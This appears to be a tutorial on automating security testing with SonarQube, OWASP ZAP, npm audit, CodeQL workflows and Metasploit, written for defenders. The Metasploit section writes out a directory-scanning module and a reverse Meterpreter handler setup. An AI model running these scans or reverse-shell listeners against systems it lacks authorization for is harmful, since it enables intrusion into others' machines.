Security Testing Automation: SAST, DAST, and Penetration Testing

Security Testing Fundamentals

Security testing finds the flaws an attacker would otherwise find first. Automating it inside the development lifecycle catches issues while they are still cheap to fix, in the pull request rather than in production, and makes the checks repeatable instead of depending on a one-off review.

Types of Security Testing

  • SAST (Static Application Security Testing): Analyze source code or bytecode without executing it, using rules and data-flow (taint) analysis to find injection sinks, weak cryptography and hardcoded secrets; runs early, but lacks runtime context and so produces false positives that need triage
  • DAST (Dynamic Application Security Testing): Probe the running application over HTTP the way an attacker would; language-agnostic and finds deployment and configuration flaws, but only on the paths the scanner can reach and authenticate to
  • IAST (Interactive Application Security Testing): Instrument the running application so that requests from a scanner or test suite are traced through the code, combining the precision of SAST with the runtime evidence of DAST
  • SCA (Software Composition Analysis): Match the project's dependencies (from the lockfile or an SBOM) against published vulnerability advisories
  • Penetration Testing: A human simulating real-world attacks, chaining findings and probing business logic that automated tools miss

SAST with SonarQube

# sonar-project.properties example (Java properties files use # for comments)
sonar.projectKey=my-application
sonar.projectName=My Application
sonar.projectVersion=1.0
sonar.sources=src
sonar.tests=test
sonar.java.binaries=target/classes
sonar.java.test.binaries=target/test-classes
sonar.coverage.jacoco.xmlReportPaths=target/site/jacoco/jacoco.xml

# Server connection. Do not put the authentication token in this file;
# pass it to the scanner through the SONAR_TOKEN environment variable
# (a CI secret) instead, so it never lands in version control.
sonar.host.url=https://sonarqube.example.com

# Security rules (Vulnerabilities and Security Hotspots) are not switched on
# in this file: they come from the Quality Profile assigned to the project in
# SonarQube, and the project's Quality Gate decides whether the analysis passes.

OWASP ZAP for DAST

// OWASP ZAP Automation Example (Node.js client from the "zaproxy" npm package)
// ZAP must already be running in daemon mode, for example:
//   zap.sh -daemon -port 8080 -config api.key=$ZAP_API_KEY
// Only run active scans against targets you own or are authorized to test.
const ZapClient = require('zaproxy');

const TARGET = process.env.ZAP_TARGET || 'https://example.com';

const sleep = ms => new Promise(resolve => setTimeout(resolve, ms));

async function runZapScan() {
    const zaproxy = new ZapClient({
        apiKey: process.env.ZAP_API_KEY, // never hard-code the API key
        proxy: 'http://localhost:8080'
    });

    // Start spider scan; the API answers with the new scan id as { scan: '<id>' }
    const { scan: spiderScanId } = await zaproxy.spider.scan({
        url: TARGET,
        maxChildren: 10,
        recurse: true
    });

    // The status view only reports progress (0-100) and returns immediately,
    // so the script has to poll it until the spider reaches 100
    while (Number((await zaproxy.spider.status({ scanId: spiderScanId })).status) < 100) {
        await sleep(2000);
    }

    // Start active scan: this sends attack payloads, hence the authorization note above
    const { scan: activeScanId } = await zaproxy.ascan.scan({
        url: TARGET,
        recurse: true
    });

    while (Number((await zaproxy.ascan.status({ scanId: activeScanId })).status) < 100) {
        await sleep(5000);
    }

    // Get the alerts for this target and fail the run on High-risk findings
    const { alerts } = await zaproxy.core.alerts({ baseurl: TARGET });
    const highRisk = alerts.filter(alert => alert.risk === 'High');
    console.log(`Security alerts: ${alerts.length} total, ${highRisk.length} High`);
    if (highRisk.length > 0) {
        for (const alert of highRisk) {
            console.error(`[High] ${alert.name} at ${alert.url}`);
        }
        throw new Error('ZAP found High-risk alerts');
    }
    return alerts;
}

Dependency Vulnerability Scanning

// npm audit automation
// Two behaviours of `npm audit --json` break the naive version of this script:
//  1. it exits non-zero whenever vulnerabilities are found, so exec() sets
//     `error` even though stdout holds a complete JSON report;
//  2. since npm 7, `vulnerabilities` is an object keyed by package name,
//     not an array, so .filter() cannot be called on it directly.
const { exec } = require('child_process');

function runNpmAudit() {
    return new Promise((resolve, reject) => {
        exec('npm audit --json', { maxBuffer: 16 * 1024 * 1024 }, (error, stdout, stderr) => {
            // Only treat it as a tool failure when there is no report to parse
            if (error && !stdout.trim()) {
                reject(new Error(`npm audit failed: ${stderr.trim() || error.message}`));
                return;
            }

            let auditResults;
            try {
                auditResults = JSON.parse(stdout);
            } catch (parseError) {
                reject(new Error(`Unparseable npm audit output: ${parseError.message}`));
                return;
            }

            // Normalize the per-package object into an array of findings
            const vulns = Object.values(auditResults.vulnerabilities || {});

            // Check for high and critical vulnerabilities
            const criticalVulns = vulns.filter(vuln => vuln.severity === 'critical');
            const highVulns = vulns.filter(vuln => vuln.severity === 'high');

            if (criticalVulns.length > 0 || highVulns.length > 0) {
                console.error('Security vulnerabilities found!');
                console.error('Critical:', criticalVulns.length, criticalVulns.map(v => v.name).join(', '));
                console.error('High:', highVulns.length, highVulns.map(v => v.name).join(', '));
                reject(new Error('Security vulnerabilities detected'));
            } else {
                console.log('No critical or high vulnerabilities found');
                resolve(auditResults);
            }
        });
    });
}

Penetration Testing with Metasploit

# Metasploit Framework Example (msfconsole)
# Use only against systems you own or have written authorization to test.

# Enumerate web directories on the target (HTTP on the module's default RPORT 80)
use auxiliary/scanner/http/dir_scanner
set RHOSTS 192.168.1.100
set THREADS 10
run

# Start a listener for a reverse Meterpreter connection. On its own this only
# opens a socket on LHOST:LPORT; a session appears only after a payload built
# with the same LHOST/LPORT runs on the target. -j backgrounds the handler so
# the console stays usable.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444
exploit -j

Security Testing in CI/CD

# GitHub Actions Security Workflow (.github/workflows/security.yml)
name: Security Testing

on: [push, pull_request]

# CodeQL uploads SARIF results, which needs security-events: write;
# everything else runs with read-only repository access.
permissions:
  contents: read
  security-events: write

jobs:
  security-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Initialize CodeQL (SAST)
        uses: github/codeql-action/init@v3
        with:
          languages: javascript, python

      - name: Perform CodeQL Analysis
        uses: github/codeql-action/analyze@v3

      - uses: actions/setup-node@v4
        with:
          node-version: 20

      - name: Run npm audit (SCA)
        # exits non-zero, and so fails the job, on high or critical advisories
        run: npm audit --audit-level=high

      - name: Run OWASP ZAP (DAST)
        # This is an active scan: point it at a deployment you control,
        # never at a third-party site.
        uses: zaproxy/action-full-scan@v0.4.0
        with:
          target: 'https://example.com'
          allow_issue_writing: false

Common Security Vulnerabilities to Test

  • SQL Injection: Confirm every query uses parameterized statements (prepared statements or a query builder that binds values); input validation is a supporting control, not the fix
  • Cross-Site Scripting (XSS): Verify output encoding matches the context (HTML body, attribute, JavaScript, URL) and that a Content-Security-Policy header is set
  • Cross-Site Request Forgery (CSRF): Test that state-changing requests require a per-session token checked server-side, and that session cookies carry a SameSite attribute
  • Authentication Bypass: Test login, password reset and session handling for default credentials, missing rate limiting and session fixation
  • Authorization Issues: Test access control for horizontal escalation (another user's object IDs) and vertical escalation (admin endpoints called as a normal user)
  • Sensitive Data Exposure: Check error messages, logs, responses and caches for secrets and personal data, and confirm TLS is enforced

Security Testing Best Practices

  • Integrate security testing into the CI/CD pipeline
  • Use multiple security testing tools
  • Regularly update security testing tools
  • Train developers on secure coding practices
  • Implement security monitoring and alerting
  • Conduct regular security assessments

Security Testing Tools

  • SonarQube: Code quality and security analysis
  • OWASP ZAP: Web application security scanner
  • Burp Suite: Web application security testing
  • Snyk: Dependency vulnerability scanning
  • Bandit: Python security linter
  • ESLint (eslint-plugin-security): JavaScript security rules

Further Reading

  • "The Web Application Hacker's Handbook" by Dafydd Stuttard and Marcus Pinto
  • "OWASP Testing Guide" by the OWASP Foundation
  • "Security Engineering" by Ross Anderson

Subscribe to AI.TDD - The New Paradigm of Software Development
